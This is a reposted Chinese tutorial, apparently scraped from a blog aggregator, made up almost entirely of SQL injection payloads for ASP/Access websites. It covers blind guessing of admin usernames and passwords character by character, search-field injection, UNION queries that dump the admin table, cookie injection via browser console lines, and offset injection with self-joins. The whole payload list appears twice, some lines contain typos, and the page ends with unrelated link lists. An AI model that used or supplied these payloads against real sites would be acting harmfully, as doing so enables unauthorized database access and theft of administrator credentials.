注入语句详解---get注入、搜索型注入、cookie注入等
来源:互联网 发布:大连淘宝模特 编辑:程序博客网 时间:2024/05/17 06:59
注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='
拆半法
######################################
and exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。
and exists (select * from admin)
and exists(select id from admin)
and exists(select id from admin where id=1)
and exists(select id from admin where id>1)
然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围
and exists (select username from admin)
and exists (select password from admin)
and exists (select id from admin where len(username)<10 and id=1)
and exists (select id from admin where len(username)>5 and id=1)
and exists (select id from admin where len(username)=6 and id=1)
and exists (select id from admin where len(password)<10 and id=1)
and exists (select id from admin where len(password)>5 and id=1)
and exists (select id from admin where len(password)=7 and id=1)
and (select top 1 asc(mid(username,1,1)) from admin)=97
返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。
猜第二位把username,1,1改成username,2,1就可以了。
猜密码把username改成password就OK了
##################################################
搜索型注入
##################################
%' and 1=1 and '%'='
%' and exists (select * from admin) and '%'='
%' and exists(select id from admin where id=1) and '%'='
%' and exists (select id from admin where len(username)<10 and id=1) and '%'='
%' and exists (select id from admin where len(password)=7 and id=1) and '%'='
%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='
这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='
对于MSSQL数据库,后面可以吧 and '%'='换成--
还有一点搜索型注入也可以使用union语句。
########################################################
联合查询。
#####################################
order by 10
and 1=2 union select 1,2,3,4,5,6,7,8,9,10
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1
很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)
###################################
cookie注入
###############################
http://www.******.com/shownews.asp?id=127
http://www.******.com/shownews.asp
alert(="id="+escape("127"));
alert(="id="+escape("127 and 1=1"));
alert(="id="+escape("127 order by 10"));
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));
这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。
###################################
偏移注入
###########################################################
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on
a.id=d.id)
and 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)
拆半法
######################################
and exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。
and exists (select * from admin)
and exists(select id from admin)
and exists(select id from admin where id=1)
and exists(select id from admin where id>1)
然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围
and exists (select username from admin)
and exists (select password from admin)
and exists (select id from admin where len(username)<10 and id=1)
and exists (select id from admin where len(username)>5 and id=1)
and exists (select id from admin where len(username)=6 and id=1)
and exists (select id from admin where len(password)<10 and id=1)
and exists (select id from admin where len(password)>5 and id=1)
and exists (select id from admin where len(password)=7 and id=1)
and (select top 1 asc(mid(username,1,1)) from admin)=97
返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。
猜第二位把username,1,1改成username,2,1就可以了。
猜密码把username改成password就OK了
##################################################
搜索型注入
##################################
%' and 1=1 and '%'='
%' and exists (select * from admin) and '%'='
%' and exists(select id from admin where id=1) and '%'='
%' and exists (select id from admin where len(username)<10 and id=1) and '%'='
%' and exists (select id from admin where len(password)=7 and id=1) and '%'='
%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='
这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='
对于MSSQL数据库,后面可以吧 and '%'='换成--
还有一点搜索型注入也可以使用union语句。
########################################################
联合查询。
#####################################
order by 10
and 1=2 union select 1,2,3,4,5,6,7,8,9,10
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1
很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)
###################################
cookie注入
###############################
http://www.******.com/shownews.asp?id=127
http://www.******.com/shownews.asp
alert(="id="+escape("127"));
alert(="id="+escape("127 and 1=1"));
alert(="id="+escape("127 order by 10"));
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));
这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。
###################################
偏移注入
###########################################################
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on
a.id=d.id)
and 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)
and 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
转自:http://tiwson.iteye.com/blog/1919349
- 注入语句详解---get注入、搜索型注入、cookie注入等
- SQL注入--GET注入
- 注入
- 注入
- 注入
- cookie注入
- cookie注入
- Cookie注入
- SQL注入之GET型常规注入
- SQL注入之cookie注入
- SQL注入之cookie注入
- ASP搜索型注入
- 搜索型注入
- access搜索型注入
- SQL注入系列之PHP+Mysql手动注入(三)----搜索型(POST/GET)
- 搜索型注入的文章
- 搜索型注入的文章
- Sqlserver2008+搜索型注入技术
- java 内部类
- 【leetcode】Climbing Stairs
- jQuery筛选器children()案例详解(图文)_jquery_脚本之家
- opencv中setMousecallback的用法
- 关于Java子类访问父类的私有变量
- 注入语句详解---get注入、搜索型注入、cookie注入等
- C和MFC链接错误Link2005
- Lambda表达式摘录
- dojo
- 对AttributeSet和defStyle的理解
- postgreSQL调用存储过程使用refcursor的几种方法
- 在DIV里面的背景图片上添加超链接
- 巧用mysqld_multi实现多主对一从的mysql复制
- linux命令dd